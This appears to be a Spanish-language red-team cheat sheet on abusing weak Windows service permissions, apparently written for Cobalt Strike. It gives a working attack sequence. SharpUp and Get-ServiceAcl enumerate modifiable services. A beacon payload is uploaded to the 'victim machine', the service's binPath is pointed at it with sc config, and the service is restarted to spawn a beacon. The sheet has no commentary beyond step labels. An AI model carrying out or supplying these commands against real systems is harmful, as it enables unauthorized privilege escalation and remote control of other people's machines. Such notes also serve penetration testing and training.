Weak Service Permissions
Identificar servicios vulnerables.
execute-assembly C:\Tools\SharpUp.exe audit ModifiableServices
Muestra los permisos de los servicios que podemos modificar.
powershell-import c:\Tools\Get-ServiceACL.ps1
powershell Get-ServiceAcl -Name "Vulnerable Service 2" | select -expandproperty Access
Creamos un payload y lo subimos a la maquina victima.
mkdir c:\Temp
cd c:\Temp
upload C:\Tools\Payloads\tcp_beacon_x64.exe
mv tcp_beacon_x64.exe Service2.exe
Configuracion del servicio.
run sc config "Vulnerable Service 2" binPath= C:\Temp\Service2.exe
Verificar las caracteristicas del servicio.
run sc qc "Vulnerable Service 2"
Iniciar servicio.
run sc stop "Vulnerable Service 2"
run sc start "Vulnerable Service 2"
Acceder al beacon.
connect localhost 4444